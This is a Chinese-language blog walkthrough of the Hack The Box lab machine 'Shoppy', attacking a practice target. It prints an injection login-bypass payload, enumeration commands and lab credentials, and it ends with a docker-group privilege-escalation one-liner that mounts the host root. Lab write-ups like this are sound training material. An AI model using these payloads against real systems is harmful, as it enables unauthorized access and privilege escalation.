HTB靶机:Shoppy
HTB靶机:Shoppy
靶机信息:
信息收集:
rustscan -a 10.10.11.180 -- -sC -sV -oN namp |
有22,80端口
使用ip访问发现需要绑定host:
echo '10.10.11.180 shoppy.htb'|sudo tee -a /etc/hosts |
进行目录爆破;
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://shoppy.htb |
登录存在sql注入,使用以下语句即可绕过
admin' || 'a'=='a |
使用相同语句,在exports功能获取到一串json数据
_id "62db0e93d6d6a999a66ee67a" |
使用https://crackstation.net/成功爆破出一个`josh`密码为`remembermethisway`
但很可惜不是ssh登录密码;继续信息收集
gobuster vhost -u http://shoppy.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt |
存在一个http://mattermost.shoppy.htb/
子域名
使用刚刚爆破出来的josh
:remembermethisway
登录;获取到ssh账号密码
username: jaeger |
成功获取user.txt
提权
sudo -l |
获取到deploy
用户的密码Sample
cat /home/deploy/password-manager |
尝试获取deploy
的密码为Deploying@pp!
登录到deploy
用户发现他在docker用户组中,在网站查找https://gtfobins.github.io/gtfobins/docker/直接提权
docker run -v /:/mnt --rm -it alpine chroot /mnt sh |
总结
这台靶机主要一个关键点就是子域名的搜索,只要找到http://mattermost.shoppy.htb/
这个子域名,后面的操作就很常规。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 le0le!